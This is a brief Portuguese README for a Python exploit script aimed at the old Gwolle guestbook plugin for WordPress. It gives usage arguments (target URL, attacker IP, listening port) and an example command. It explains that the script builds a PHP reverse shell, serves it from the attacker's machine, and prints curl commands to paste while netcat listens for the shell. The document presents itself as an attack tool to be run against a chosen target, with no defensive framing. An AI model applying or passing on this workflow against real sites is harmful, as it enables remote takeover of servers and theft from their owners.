
Este script é um exploit para o plugin antigo gwolle do WordPress.
este script é um exploit para o plugin antigo do WordPress gwolle
uso:
./gwolle_buster.py <target_url>
primeiro argumento <target_url> => a url do seu alvo do WordPress que tem gwolle instalado segundo argumento => seu ip terceiro argumento => porta de escuta para o reverse shell
exemplo: ./gwolle_buster.py http://vulnpress.com/ 192.168.1.5 1234
Este Script irá gerar o script php reverse shell e iniciar o servidor simples, então você precisa abrir 2 novos terminais e escutar com netcat no primeiro terminal, e fazer requisições com comandos curl, porém, os comandos são gerados automaticamente e aparecem no console, portanto, você pode copiar e colar facilmente